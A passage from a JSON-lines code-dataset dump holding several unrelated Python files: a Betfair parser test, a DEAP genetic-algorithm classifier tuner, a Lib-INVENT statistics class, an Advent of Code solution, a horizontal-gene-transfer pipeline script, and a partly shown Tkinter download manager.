2,\n\t\t\t\t\t'status': 'ACTIVE'\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t'id': 261273,\n\t\t\t\t\t'name': 'Middlesbrough/Man City',\n\t\t\t\t\t'sortPriority': 3,\n\t\t\t\t\t'status': 'ACTIVE'\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t'id': 71081,\n\t\t\t\t\t'name': 'Draw/Middlesbrough',\n\t\t\t\t\t'sortPriority': 4,\n\t\t\t\t\t'status': 'ACTIVE'\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t'id': 3710152,\n\t\t\t\t\t'name': 'Draw/Draw',\n\t\t\t\t\t'sortPriority': 5,\n\t\t\t\t\t'status': 'ACTIVE'\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t'id': 69426,\n\t\t\t\t\t'name': 'Draw/Man City',\n\t\t\t\t\t'sortPriority': 6,\n\t\t\t\t\t'status': 'ACTIVE'\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t'id': 3507812,\n\t\t\t\t\t'name': 'Man City/Middlesbrough',\n\t\t\t\t\t'sortPriority': 7,\n\t\t\t\t\t'status': 'ACTIVE'\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t'id': 69424,\n\t\t\t\t\t'name': 'Man City/Draw',\n\t\t\t\t\t'sortPriority': 8,\n\t\t\t\t\t'status': 'ACTIVE'\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t'id': 69423,\n\t\t\t\t\t'name': 'Man City/Man City',\n\t\t\t\t\t'sortPriority': 9,\n\t\t\t\t\t'status': 'ACTIVE'\n\t\t\t\t}\n\t\t\t],\n\t\t\t'runnersVoidable': False,\n\t\t\t'status': 'OPEN',\n\t\t\t'suspendTime': '2017-04-30T13:05:00.000Z',\n\t\t\t'timezone': 'Europe/London',\n\t\t\t'turnInPlayEnabled': True,\n\t\t\t'version': 1624812955\n\t\t}\n\n\t\tassert md == expected_md\n\n\tdef test_get_market_definition_no_marketDefintion(self):\n\t\tmd = parser.get_market_definition({})\n\t\tassert not md\n\n\t# get_runner_change tests\n\tdef test_get_runner_change_with_rc(self):\n\t\trc = parser.get_runner_change(market_change)\n\t\tassert rc == [{'ltp': 2.1, 'id': 69423}, {'ltp': 25.0, 'id': 71080}]\n\n\tdef test_get_runner_change_no_rc(self):\n\t\trc = parser.get_runner_change({})\n\t\tassert not rc\n\t\n\t# get_published_time tests\n\tdef test_get_published_time_with_pt(self):\n\t\tpt = parser.get_published_time(market)\n\t\tassert pt == 1493129993643\n\n\tdef test_get_published_time_no_pt(self):\n\t\twith pytest.raises(InvalidMarket):\n\t\t\tparser.get_published_time({})\n","repo_name":"petermclagan/betfair-historical","sub_path":"tests/test_parser.py","file_name":"test_parser.py","file_ext":"py","file_size_in_byte":6080,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"44"} +{"seq_id":"9344116934","text":"import random\nimport time\n\nimport pandas as pd\nfrom deap import base\nfrom deap import creator\nfrom deap import tools\nfrom sklearn import model_selection\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.svm import SVC\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.gaussian_process import GaussianProcessClassifier\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier\n\nfrom SVC_classifier import mutationSVC, SVCParametersFitness, SVCParameters\nfrom KNeighborsClassifier_classifier import mutationKNeighborsClassifier, KNeighborsClassifierParametersFitness,\\\n KNeighborsClassifierParameters\nfrom MLPClassifier_classifier import mutationMLPClassifier, MLPClassifierParametersFitness, MLPClassifierParameters\nfrom GaussianProcessClassifier_classifier import mutationGaussianProcessClassifier,\\\n GaussianProcessClassifierParametersFitness, GaussianProcessClassifierParameters\nfrom DecisionTreeClassifier_classifier import mutationDecisionTreeClassifier, DecisionTreeClassifierParametersFitness,\\\n DecisionTreeClassifierParameters\nfrom RandomForestClassifier_classifier import mutationRandomForestClassifier, RandomForestClassifierParametersFitness,\\\n RandomForestClassifierParameters\nfrom plots import make_plots\n\n\ndef main():\n pd.set_option('display.max_columns', None)\n # df = pd.read_csv(\"project04/data.csv\", sep=';') # for Visual Studio Code\n df = pd.read_csv(\"data.csv\", sep=';') # for PyCharm\n y = df['status']\n df.drop('status', axis=1, inplace=True)\n numberOfAtributtes = len(df.columns)\n\n mms = MinMaxScaler()\n df_norm = mms.fit_transform(df)\n # -----------classifier-1-------------------------------\n # clf = SVC()\n # clf = KNeighborsClassifier()\n # clf = MLPClassifier()\n # clf = GaussianProcessClassifier()\n # clf = DecisionTreeClassifier()\n clf = RandomForestClassifier()\n\n # -----------classifier-1-------------------------------\n scores = model_selection.cross_val_score(clf, df_norm, y, cv=5, scoring='accuracy', n_jobs=-1)\n print(scores.mean())\n\n creator.create(\"FitnessMax\", base.Fitness, weights=(-1.0,))\n creator.create(\"Individual\", list, fitness=creator.FitnessMax)\n toolbox = base.Toolbox()\n\n # generowanie nowych osobników\n # -----------classifier-2-------------------------------\n # toolbox.register('individual', SVCParameters, numberOfAtributtes, creator.Individual)\n # toolbox.register('individual', KNeighborsClassifierParameters, numberOfAtributtes, creator.Individual)\n # toolbox.register('individual', MLPClassifierParameters, numberOfAtributtes, creator.Individual)\n # toolbox.register('individual', GaussianProcessClassifierParameters, numberOfAtributtes, creator.Individual)\n # toolbox.register('individual', DecisionTreeClassifierParameters, numberOfAtributtes, creator.Individual)\n toolbox.register('individual', RandomForestClassifierParameters, numberOfAtributtes, creator.Individual)\n # -----------classifier-2-------------------------------\n toolbox.register(\"population\", tools.initRepeat, list, toolbox.individual)\n\n # wskazanie funkcji celu\n # -----------classifier-3-------------------------------\n # toolbox.register(\"evaluate\", SVCParametersFitness, y, df, numberOfAtributtes)\n # toolbox.register(\"evaluate\", KNeighborsClassifierParametersFitness, y, df, numberOfAtributtes)\n # toolbox.register(\"evaluate\", MLPClassifierParametersFitness, y, df, numberOfAtributtes)\n # toolbox.register(\"evaluate\", GaussianProcessClassifierParametersFitness, y, df, numberOfAtributtes)\n # toolbox.register(\"evaluate\", DecisionTreeClassifierParametersFitness, y, df, numberOfAtributtes)\n toolbox.register(\"evaluate\", RandomForestClassifierParametersFitness, y, df, numberOfAtributtes)\n # -----------classifier-3-------------------------------\n\n # wybieranie algorytmu selekcji\n # toolbox.register(\"select\", tools.selTournament, tournsize=3)\n # toolbox.register(\"select\", tools.selRandom)\n # toolbox.register(\"select\", tools.selBest)\n # toolbox.register(\"select\", tools.selWorst)\n toolbox.register(\"select\", tools.selRoulette)\n\n # krzyżowanie dla binarnej reprezentacji\n # toolbox.register(\"mate\", tools.cxOnePoint)\n # toolbox.register(\"mate\", tools.cxUniform)\n toolbox.register(\"mate\", tools.cxTwoPoint)\n\n # definicja algorytmu mutacji\n # -----------classifier-4-------------------------------\n # toolbox.register(\"mutate\", mutationSVC)\n # toolbox.register(\"mutate\", mutationKNeighborsClassifier)\n # toolbox.register(\"mutate\", mutationMLPClassifier)\n # toolbox.register(\"mutate\", mutationGaussianProcessClassifier)\n # toolbox.register(\"mutate\", mutationDecisionTreeClassifier)\n toolbox.register(\"mutate\", mutationRandomForestClassifier)\n # -----------classifier-4-------------------------------\n\n # konfiguracja parametów algorytmu genetycznego\n sizePopulation = 100\n probabilityMutation = 0.6\n probabilityCrossover = 0.8\n numberIteration = 10 # <- było 300\n # generujemy początkową populację i obliczamy jej wartość funkcji dopasowania\n pop = toolbox.population(n=sizePopulation)\n\n fitnesses = list(map(toolbox.evaluate, pop))\n for ind, fit in zip(pop, fitnesses):\n ind.fitness.values = fit\n\n # pętla genetyczna\n g = 0\n numberElitism = 1\n all_best_inds = []\n all_fits = []\n\n start_time = time.time()\n while g < numberIteration:\n g = g + 1\n print(\"-- Generation %i --\" % g)\n\n # Select the next generation individuals\n offspring = toolbox.select(pop, len(pop))\n # Clone the selected individuals\n offspring = list(map(toolbox.clone, offspring))\n\n listElitism = []\n for x in range(0, numberElitism):\n listElitism.append(tools.selWorst(pop, 1)[0])\n\n # Apply crossover and mutation on the offspring\n for child1, child2 in zip(offspring[::2], offspring[1::2]):\n\n # cross two individuals with probability CXPB\n if random.random() < probabilityCrossover:\n # toolbox.mate(child1, child2, probabilityCrossover)\n toolbox.mate(child1, child2)\n\n # fitness values of the children\n # must be recalculated later\n del child1.fitness.values\n del child2.fitness.values\n\n for mutant in offspring:\n # mutate an individual with probability MUTPB\n if random.random() < probabilityMutation:\n # toolbox.mutate(mutant, probabilityMutation)\n toolbox.mutate(mutant)\n del mutant.fitness.values\n\n # Evaluate the individuals with an invalid fitness\n invalid_ind = [ind for ind in offspring if not ind.fitness.valid]\n fitnesses = map(toolbox.evaluate, invalid_ind)\n for ind, fit in zip(invalid_ind, fitnesses):\n ind.fitness.values = fit\n\n print(\" Evaluated %i individuals\" % len(invalid_ind))\n pop[:] = offspring + listElitism\n\n # Gather all the fitnesses in one list and print the stats\n fits = [ind.fitness.values[0] for ind in pop]\n\n length = len(pop)\n mean = sum(fits) / length\n sum2 = sum(x * x for x in fits)\n std = abs(sum2 / length - mean ** 2) ** 0.5\n\n print(\" Min %s\" % min(fits))\n print(\" Max %s\" % max(fits))\n print(\" Avg %s\" % mean)\n print(\" Std %s\" % std)\n best_ind = tools.selWorst(pop, 1)[0]\n # -----------classifier-5-------------------------------\n # all_best_inds.append(SVCParametersFitness(y, df, numberOfAtributtes, best_ind))\n # all_best_inds.append(KNeighborsClassifierParametersFitness(y, df, numberOfAtributtes, best_ind))\n # all_best_inds.append(MLPClassifierParametersFitness(y, df, numberOfAtributtes, best_ind))\n # all_best_inds.append(GaussianProcessClassifierParametersFitness(y, df, numberOfAtributtes, best_ind))\n # all_best_inds.append(DecisionTreeClassifierParametersFitness(y, df, numberOfAtributtes, best_ind))\n all_best_inds.append(RandomForestClassifierParametersFitness(y, df, numberOfAtributtes, best_ind))\n # -----------classifier-5-------------------------------\n all_fits.append(fits)\n print(\"Best individual is %s, %s\" % (best_ind, best_ind.fitness.values))\n\n print(\"-- End of (successful) evolution --\")\n end_time = time.time()\n print(f'Evolution time: {end_time - start_time} [ms]')\n make_plots(all_best_inds, all_fits)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Jeremiaszmacura/PK-classical-evolution-algorithm","sub_path":"project04/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"70287183172","text":"import random\nimport scipy.stats as sps\n\nimport numpy as np\nimport torch\nfrom rdkit import Chem\nfrom reinvent_chemistry.library_design import BondMaker, AttachmentPoints\n\nfrom models.actions.calculate_nlls_from_model import CalculateNLLsFromModel\nfrom models.actions.sample_model import SampleModel\n\n\nclass CollectStatsFromModel:\n \"\"\"Collects stats from an existing RNN model.\"\"\"\n\n def __init__(self, model, epoch, training_set, validation_set, sample_size,\n decoration_type=\"all\", with_weights=False, other_values=None):\n \"\"\"\n Creates an instance of CollectStatsFromModel.\n : param model: A model instance initialized as sampling_mode.\n : param epoch: Epoch number to be sampled(informative purposes).\n : param training_set: Iterator with the training set.\n : param validation_set: Iterator with the validation set.\n : param writer: Writer object(Tensorboard writer).\n : param other_values: Other values to save for the epoch.\n : param sample_size: Number of molecules to sample from the training / validation / sample set.\n : param decoration_type: Kind of decorations (single or all).\n : param with_weights: To calculate or not the weights.\n : return:\n \"\"\"\n\n self.model = model\n self.epoch = epoch\n self.sample_size = sample_size\n self.training_set = training_set\n self.validation_set = validation_set\n self.other_values = other_values\n\n self.decoration_type = decoration_type\n self.with_weights = with_weights\n self.sample_size = max(sample_size, 1)\n\n self._bond_maker = BondMaker()\n self._attachment_points = AttachmentPoints()\n self._calc_nlls_action = CalculateNLLsFromModel(self.model, 128)\n self._sample_model_action = SampleModel(self.model, 128)\n\n @torch.no_grad()\n def run(self):\n \"\"\"\n Collects stats for a specific model object, epoch, validation set, training set and writer object.\n : return: A dictionary with all the data saved for that given epoch.\n \"\"\"\n data = {}\n sliced_training_set = list(random.sample(self.training_set, self.sample_size))\n sliced_validation_set = list(random.sample(self.validation_set, self.sample_size))\n\n sampled_training_mols, sampled_training_nlls = self._sample_decorations(next(zip(*sliced_training_set)))\n sampled_validation_mols, sampled_validation_nlls = self._sample_decorations(next(zip(*sliced_validation_set)))\n\n training_nlls = np.array(list(self._calc_nlls_action.run(sliced_training_set)))\n validation_nlls = np.array(list(self._calc_nlls_action.run(sliced_validation_set)))\n\n data.update({\"sampled_training_mols\": sampled_training_mols, \"sampled_validation_mols\": sampled_validation_mols,\n \"training_nlls\": training_nlls, \"validation_nlls\": validation_nlls,\n \"binned_jsd\": self.jsd([sampled_training_nlls, sampled_validation_nlls,\n training_nlls, validation_nlls], binned=True),\n \"unbinned_jsd\": self.jsd([sampled_training_nlls, sampled_validation_nlls,\n training_nlls, validation_nlls], binned=False)\n })\n return data\n\n def _sample_decorations(self, scaffold_list):\n mols = []\n nlls = []\n for scaff, decoration, nll in self._sample_model_action.run(scaffold_list):\n labeled_scaffold = self._attachment_points.add_attachment_point_numbers(scaff, canonicalize=False)\n molecule = self._bond_maker.join_scaffolds_and_decorations(labeled_scaffold, decoration)\n if molecule:\n mols.append(Chem.MolToSmiles(molecule))\n nlls.append(nll)\n return mols, np.array(nlls)\n\n def bin_dist(self, dist, bins=1000, dist_range=(0, 100)):\n bins = np.histogram(dist, bins=bins, range=dist_range, density=False)[0]\n bins[bins == 0] = 1\n return bins / bins.sum()\n\n def jsd(self, dists, binned=False):\n min_size = min(len(dist) for dist in dists)\n dists = [dist[:min_size] for dist in dists]\n if binned:\n dists = [self.bin_dist(dist) for dist in dists]\n num_dists = len(dists)\n avg_dist = np.sum(dists, axis=0) / num_dists\n return sum((sps.entropy(dist, avg_dist) for dist in dists)) / num_dists\n","repo_name":"MolecularAI/Lib-INVENT","sub_path":"models/actions/collect_stats_from_model.py","file_name":"collect_stats_from_model.py","file_ext":"py","file_size_in_byte":4471,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"44"} +{"seq_id":"73097555652","text":"with open('day6input') as f:\n groups = f.read().split(\"\\n\\n\")\n\n# Part One\nsum = 0\nfor group in groups:\n l = list()\n group = group.replace('\\n', '')\n count = len(set([c for c in group])) # by creating a set we eliminate all duplicates. The len of that is our count\n sum += count\n\nprint(sum)\n\n# Part Two\nsum = 0\nfor group in groups:\n l = list()\n group = group.split(\"\\n\")\n groupset = set(group[0]) # first \"groupset\" needs to be the set of the first person\n for person in group:\n personset = set([c for c in person])\n groupset = groupset & personset # now we can use the intersection set operation on the group and person set\n sum += len(groupset) # and only questions to which everyone answered \"yes\" are add to our final\n # groupset. Now we can sum up the counts\nprint(sum)","repo_name":"blanks-hub/MyAdventOfCode2020","sub_path":"day6.py","file_name":"day6.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"35457372121","text":"import sys,getopt,re,os\r\nimport pandas as pd\r\ndef build_table_single(this_inf,thisfh,this_pd):\r\n\tcontent_list=this_inf.readlines()\r\n\tfor j in range(1,len(content_list)-1):\r\n\t\tline=content_list[j]\r\n\t\tline_list=line.split(\"\\t\")\r\n\t\tread_tag=line_list[0]\r\n\t\tflag=int(line_list[1])\r\n\t\ttag=line_list[2]\r\n\t\tpos=line_list[3]\r\n\t\tcigar=line_list[5]\r\n\t\tmrnm=line_list[6]\r\n\t\tread_seq=line_list[9]\r\n\t\tread_qual=line_list[10]\r\n\t\ttotal_l=0\r\n\t\tflist=re.findall(\"\\d+\\S\",cigar)\r\n\t\tfor s in flist:\r\n\t\t\tmobjx=re.match(\"(\\d+)(\\S)\",s)\r\n\t\t\tm1=mobjx.group(1)\r\n\t\t\tS1=mobjx.group(2)\r\n\t\t\tif S1!=\"M\":\r\n\t\t\t\ttotal_l+=int(m1)\r\n\t\t\telse:\r\n\t\t\t\tml=int(m1)\r\n\t\t\t\tbreak\r\n\t\tif ml>=50:\r\n\t\t\tmobj1=re.match(\"(.*)_(\\d+)_(\\d+)\",read_tag)\r\n\t\t\tchr_tag=mobj1.group(1)\r\n\t\t\tchr_start=int(mobj1.group(2))+total_l\r\n\t\t\tchr_end=chr_start+ml-1\r\n\t\t\tspe_name=this_pd.loc[tag,'species_name']\r\n\t\t\tstrain_name=this_pd.loc[tag,'strain_name']\r\n\t\t\ttarget_start=int(pos)+total_l\r\n\t\t\ttarget_end=target_start+ml-1\r\n\t\t\tprint(chr_tag+\"\\t\"+str(chr_start)+\"\\t\"+str(chr_end)+\"\\t\"+tag+\"\\t\"+str(target_start)+\"\\t\"+str(target_end)+\"\\t\"+spe_name+\"\\t\"+str(strain_name),file=thisfh)\r\n\t\t\t# try:\r\n\t\t\t\t# print(chr_tag+\"\\t\"+str(chr_start)+\"\\t\"+str(chr_end)+\"\\t\"+tag+\"\\t\"+str(target_start)+\"\\t\"+str(target_end)+\"\\t\"+spe_name+\"\\t\"+strain_name,file=thisfh)\r\n\t\t\t# except:\r\n\t\t\t\t# print(type(chr_start),type(chr_end),type(target_start),type(target_end))\r\n\t\t\t\t# sys.exit()\r\nhelp_str='HGTFinder.py -g -o '\r\ngenomefile=''\r\noutfolder=''\r\nvirus_bwa_ref='/home/hzhu/db/virus_refseq/virus_refseq_idx'\r\nbac_bwa_ref_list=[]\r\nfor i in range(10):\r\n\tbac_bwa_ref_list.append('/home/hzhu/db/bac_refseq_db/'+'bac'+str(i+1)+'_idx')\r\ntry:\r\n\topts,args=getopt.getopt(sys.argv[1:],\"hg:o:\",[\"help\"])\r\nexcept getopt.GetoptError:\r\n\tprint (help_str)\r\n\tsys.exit(2)\r\nfor opt,value in opts:\r\n\tif opt in (\"-h\",\"--help\"):\r\n\t\tprint (help_str)\r\n\t\tsys.exit()\r\n\tif opt in (\"-o\"):\r\n\t\toutfolder=value\r\n\tif opt in (\"-g\"):\r\n\t\tgenomefile=value\r\n\r\nif not(outfolder and genomefile):\r\n\tprint (help_str)\r\n\tsys.exit()\r\nelse:\r\n\tvirus_outfolder=outfolder+'/virus'\r\n\tbac_outfolder=outfolder+'/bac'\r\n\tbac_combine_outfolder=bac_outfolder+'/bac_combine'\r\n\treadsfile=outfolder+\"/shreddered.fq\"\r\n\t\r\n\tos.system('mkdir '+ outfolder)\r\n\tos.system('mkdir '+ virus_outfolder)\r\n\tos.system('mkdir '+ bac_outfolder)\r\n\tos.system('mkdir '+ bac_combine_outfolder)\r\n\tos.system('mkdir '+ bac_combine_outfolder+'/virus_reads')\r\n##############reads produce################\r\nif \"shreddered.fq\" not in os.listdir(outfolder):\r\n\tos.system(\"python ~/tools/HGTFinder/HGT_reads_produce.py \"+genomefile+\" \"+outfolder)\r\n#########################################\r\nvirus_desc=virus_bwa_ref+'.des'\r\nvpd=pd.read_csv(virus_desc,sep=\"\\t\",index_col=0)\r\ntlistdir=os.listdir(virus_outfolder)\r\nsamfile=virus_outfolder+'/virus.sam'\r\noutfile=virus_outfolder+'/virus_HGT.tab'\r\nif \"virus.sam\" not in tlistdir:\r\n\tcmd=r\"bwa mem -t 20 \"+virus_bwa_ref+\" \"+readsfile+r\" | samtools view -F 4 -o \"+samfile\r\n\tprint(cmd)\r\n\tos.system(cmd)\r\nelse:\r\n\tprint(\"virus.sam already in \"+ virus_outfolder+\", skip\")\r\ninf=open(samfile)\r\noutfh=open(outfile,\"w\")\r\nbuild_table_single(inf,outfh,vpd)\r\ninf.close()\r\noutfh.close()\r\n##########################################\r\ncombine_count=bac_combine_outfolder+'/bac_HGT_combine.tab'\r\nfor i in range(10):\r\n\tthis_bac_outfolder=bac_outfolder+'/bac'+str(i+1)\r\n\tthis_sam=this_bac_outfolder+'/bac.sam'\r\n\tthis_outfile=this_bac_outfolder+'/bac_HGT.tab'\r\n\tcpd=pd.read_csv(bac_bwa_ref_list[i]+'.des',sep=\"\\t\",index_col=0)\r\n\tif not os.path.exists(this_bac_outfolder):\r\n\t\tos.system(\"mkdir \"+this_bac_outfolder)\r\n\tif 'bac.sam' not in os.listdir(this_bac_outfolder):\r\n\t\tbac_cmd=r\"bwa mem -t 20 \"+bac_bwa_ref_list[i]+\" \"+readsfile+r\" | samtools view -F 4 -o \"+this_sam\r\n\t\tprint(bac_cmd)\r\n\t\tos.system(bac_cmd)\r\n\telse:\r\n\t\tprint(\"bac.sam already in \"+ this_bac_outfolder+\", skip\")\r\n\tif \"bac_HGT.tab\" not in this_bac_outfolder:\r\n\t\tinf=open(this_sam)\r\n\t\toutfh=open(this_outfile,\"w\")\r\n\t\tbuild_table_single(inf,outfh,cpd)\r\n\t\tinf.close()\r\n\t\toutfh.close()\r\n\telse:\r\n\t\tprint(\"bac_HGT.tab already in \"+this_bac_outfolder+\", skip\")\r\n\tcombine_cmd=\"cat \"+this_outfile+\" >> \"+combine_count\r\n\tprint(combine_cmd)\r\n\tos.system(combine_cmd)\r\nmodified_combine_count=combine_count+'.mod'\r\nmerge_cmd=\"python ~/tools/HGTFinder/HGT_tab_merge.py \"+combine_count+\" \"+modified_combine_count\r\nprint(merge_cmd)\r\nos.system(merge_cmd)","repo_name":"weibozheng/Horizontal-Gene-Transfer","sub_path":"HGTFinder.py","file_name":"HGTFinder.py","file_ext":"py","file_size_in_byte":4357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"7299789046","text":"import time\nfrom tkinter import (Tk, DISABLED, NORMAL, Frame, SUNKEN, TOP, BOTH, GROOVE,\n LabelFrame)\nfrom tkinter import (font, StringVar, Label, Button, X, RIDGE, Entry, LEFT, W,\n HORIZONTAL)\nimport tkinter.ttk as ttk\nfrom pySmartDL import SmartDL\nimport threading\nimport os\nfrom PIL import ImageTk, Image\nimport sys\n\ncwd = os.path.dirname(os.path.realpath(__file__))\n\n\nclass AlDownloadManager():\n\n def __init__(self):\n root = Tk(className=\" ALDOWNLOADMANAGER \")\n root.geometry(\"700x360+1200+635\")\n root.resizable(0, 0)\n iconPath = os.path.join(cwd+'\\\\UI\\\\icons',\n 'aldownloadmanager.ico')\n root.iconbitmap(iconPath)\n root.config(bg=\"#ffffff\")\n self.defaultColor = ''\n self.isPaused = False\n self.downloadObject = ''\n self.inputLink = StringVar()\n self.statusMessage = StringVar()\n self.speedMessage = StringVar()\n self.destinationMessage = StringVar()\n self.sizeMessage = StringVar()\n self.timeMessage = StringVar()\n textHighlightFont = font.Font(family='OnePlus Sans Display', size=15,\n weight='bold')\n appHighlightFont = font.Font(family='OnePlus Sans Display', size=12,\n weight='bold')\n textFont = font.Font(family='OnePlus Sans Text', size=10,\n weight='bold')\n self.destination = os.path.join(cwd, 'AlDownloadManager')\n root.overrideredirect(1)\n\n def liftWindow():\n root.lift()\n root.after(1000, liftWindow)\n\n def callback(event):\n root.geometry(\"700x360+1200+635\")\n\n def showScreen(event):\n root.deiconify()\n root.overrideredirect(1)\n\n def screenAppear(event):\n root.overrideredirect(1)\n\n def hideScreen():\n root.overrideredirect(0)\n root.iconify()\n\n def terminate(object):\n if object:\n object.stop()\n pauseButton['state'] = DISABLED\n stopButton['text'] = 'STOP'\n stopButton['state'] = DISABLED\n stopButton['bg'] = self.defaultColor\n pauseButton['text'] = \"PAUSE\"\n downloadButton['state'] = NORMAL\n\n def pauseResume(object):\n if self.isPaused:\n object.resume()\n pauseButton['text'] = \"PAUSE\"\n pauseButton['fg'] = \"white\"\n pauseButton.flash()\n self.isPaused = not self.isPaused\n else:\n object.pause()\n pauseButton['text'] = \"RESUME\"\n pauseButton['fg'] = \"white\"\n pauseButton.flash()\n self.isPaused = not self.isPaused\n\n def download(__url__):\n url = __url__\n self.destination = str(self.destination)\n stopButton['command'] = lambda: terminate(self.downloadObject)\n stopButton['state'] = NORMAL\n pauseButton['command'] = lambda: pauseResume(self.downloadObject)\n pauseButton['state'] = NORMAL\n\n def doDownload(sem):\n with sem:\n try:\n if self.downloadObject:\n self.downloadObject.start()\n except Exception as e:\n print(f\"------> {e}\")\n print(f\"obj err--> {self.downloadObject.get_errors()}\")\n self.statusMessage.set(f\" Status: {e}\")\n root.update_idletasks()\n\n def showProgress(sem):\n with sem:\n time.sleep(1)\n startTime = time.perf_counter()\n if self.downloadObject:\n while not (self.downloadObject.isFinished() and\n len(self.downloadObject.get_errors())) == 0:\n obj = self.downloadObject\n sts = obj.get_status().capitalize()\n speed = obj.get_speed(human=True)\n self.statusMessage.set(f\" Status: {sts}\")\n self.speedMessage.set(f\" Speed: {speed}\")\n self.destinationMessage.set(\" Working directory:\"\n f\" {self.destination}\")\n dwnld = obj.get_dl_size(human=True)\n self.sizeMessage.set(\" Downloaded so far: \"\n f\"{dwnld}\")\n elpsdTm = round(time.perf_counter() - startTime, 1)\n self.timeMessage.set(f\" Elapsed Time: {elpsdTm}\"\n if sts != 'Paused'\n else ' Elapsed Time: . . .')\n prgrs = obj.get_progress()\n progress['value'] = 100 * prgrs\n time.sleep(0.2)\n root.update_idletasks()\n if len(self.downloadObject.get_errors()) == 0:\n startPoint = time.perf_counter()\n while time.perf_counter() - startPoint < 2:\n obj = self.downloadObject\n sts = obj.get_status().capitalize()\n speed = obj.get_speed(human=True)\n self.statusMessage.set(f\" Status: {sts}\")\n self.speedMessage.set(f\" Speed: {speed}\")\n dest = obj.get_dest()\n self.destinationMessage.set(\" Saved at: \"\n f\"{dest}\")\n size = obj.get_final_filesize(human=True)\n self.sizeMessage.set(\" Total File Size: \"\n f\"{size}\")\n tmMsg = str(obj.get_dl_time(human=True))\n self.timeMessage.set(f\" Total Time: {tmMsg}\")\n prgrs = obj.get_progress()\n progress['value'] = 100 * prgrs\n time.sleep(0.2)\n root.update_idletasks()\n if progress['value'] == 100:\n print('File Downloaded')\n else:\n self.statusMessage.set(\" Status: Download \" +\n \"Failed\")\n obj = self.downloadObject\n speed = obj.get_errors()[0]\n self.speedMessage.set(f\" Reason: {speed}\")\n root.update_idletasks()\n print('Download Failed')\n\n if len(url) == 0:\n downloadButton.flash()\n else:\n try:\n self.downloadObject = SmartDL(url, self.destination)\n except Exception as e:\n print(f\"Error in {e}\")\n self.statusMessage.set(f\" Status: {e}\")\n root.update_idletasks()\n semaphore = threading.Semaphore(2)\n threading.Thread(target=doDownload, args=(semaphore,)).start()\n threading.Thread(target=showProgress,\n args=(semaphore,)).start()\n\n def clearReset():\n self.inputLink.set('')\n terminate(self.downloadObject)\n downloadButton['state'] = NORMAL\n\n def startDownloading():\n link = entryLink.get()\n if link != '':\n download(link)\n downloadButton.flash()\n downloadButton['state'] = DISABLED\n self.defaultColor = stopButton.cget('background')\n else:\n downloadButton.flash()\n\n titleBar = Frame(root, bg='#141414', relief=SUNKEN, bd=0)\n icon = Image.open(iconPath)\n icon = icon.resize((30, 30), Image.ANTIALIAS)\n icon = ImageTk.PhotoImage(icon)\n iconLabel = Label(titleBar, image=icon)\n iconLabel.photo = icon\n iconLabel.config(bg='#141414')\n iconLabel.grid(row=0, column=0, sticky=\"nsew\")\n titleLabel = Label(titleBar, text='ALDOWNLOADMANAGER', fg='#909090',\n bg='#141414', font=appHighlightFont)\n titleLabel.grid(row=0, column=1, sticky=\"nsew\")\n closeButton = Button(titleBar, text=\"x\", bg='#141414', fg=\"#909090\",\n borderwidth=0, command=root.destroy,\n font=appHighlightFont)\n closeButton.grid(row=0, column=3, sticky=\"nsew\")\n minimizeButton = Button(titleBar, text=\"-\", bg='#141414', fg=\"#909090\",\n borderwidth=0, command=hideScreen,\n font=appHighlightFont)\n minimizeButton.grid(row=0, column=2, sticky=\"nsew\")\n titleBar.grid_columnconfigure(0, weight=1)\n titleBar.grid_columnconfigure(1, weight=75)\n titleBar.grid_columnconfigure(2, weight=1)\n titleBar.grid_columnconfigure(3, weight=1)\n titleBar.pack(side=TOP, fill=X)\n\n frameInput = Frame(root, relief=RIDGE, borderwidth=0, bg='#333c4e')\n frameInput.pack(fill=BOTH, expand=1)\n\n frameStatus = LabelFrame(root, text=\" Information------------------\" +\n \"------------------------------------------\" +\n \"----------------------\", relief=SUNKEN,\n bg='#16a4fa', borderwidth=0,\n font=textHighlightFont, fg='white')\n frameStatus.pack(fill=BOTH, expand=1)\n\n frameProgress = Frame(root, relief=GROOVE, borderwidth=0, bg='white')\n frameProgress.pack(fill=BOTH, expand=1)\n\n frameAction = Frame(root, relief=GROOVE, borderwidth=0, bg='white')\n frameAction.pack(fill=BOTH, expand=1)\n\n labelLink = Label(frameInput, text=\"Enter URL\", font=textHighlightFont,\n bg='#333c4e', fg='#9cabc4')\n labelLink.pack(fill=X)\n entryLink = Entry(frameInput, textvariable=self.inputLink,\n font=textFont)\n entryLink.pack(fill=X, expand=1, side=LEFT, padx=10, pady=5)\n\n labelStatus = Label(frameStatus, textvariable=self.statusMessage,\n justify=LEFT, bg='#16a4fa', fg='white',\n font=textFont)\n labelStatus.grid(row=1, column=0, sticky=W)\n labelSpeed = Label(frameStatus, textvariable=self.speedMessage,\n justify=LEFT, bg='#16a4fa', fg='white',\n font=textFont)\n labelSpeed.grid(row=2, column=0, sticky=W)\n labelSize = Label(frameStatus, textvariable=self.sizeMessage,\n justify=LEFT, bg='#16a4fa', fg='white',\n font=textFont)\n labelSize.grid(row=3, column=0, sticky=W)\n labelTime = Label(frameStatus, textvariable=self.timeMessage,\n justify=LEFT, bg='#16a4fa', fg='white',\n font=textFont)\n labelTime.grid(row=4, column=0, sticky=W)\n labelDestination = Label(frameStatus,\n textvariable=self.destinationMessage,\n justify=LEFT, bg='#16a4fa', fg='white',\n font=textFont)\n labelDestination.grid(row=5, column=0, sticky=W)\n\n style = 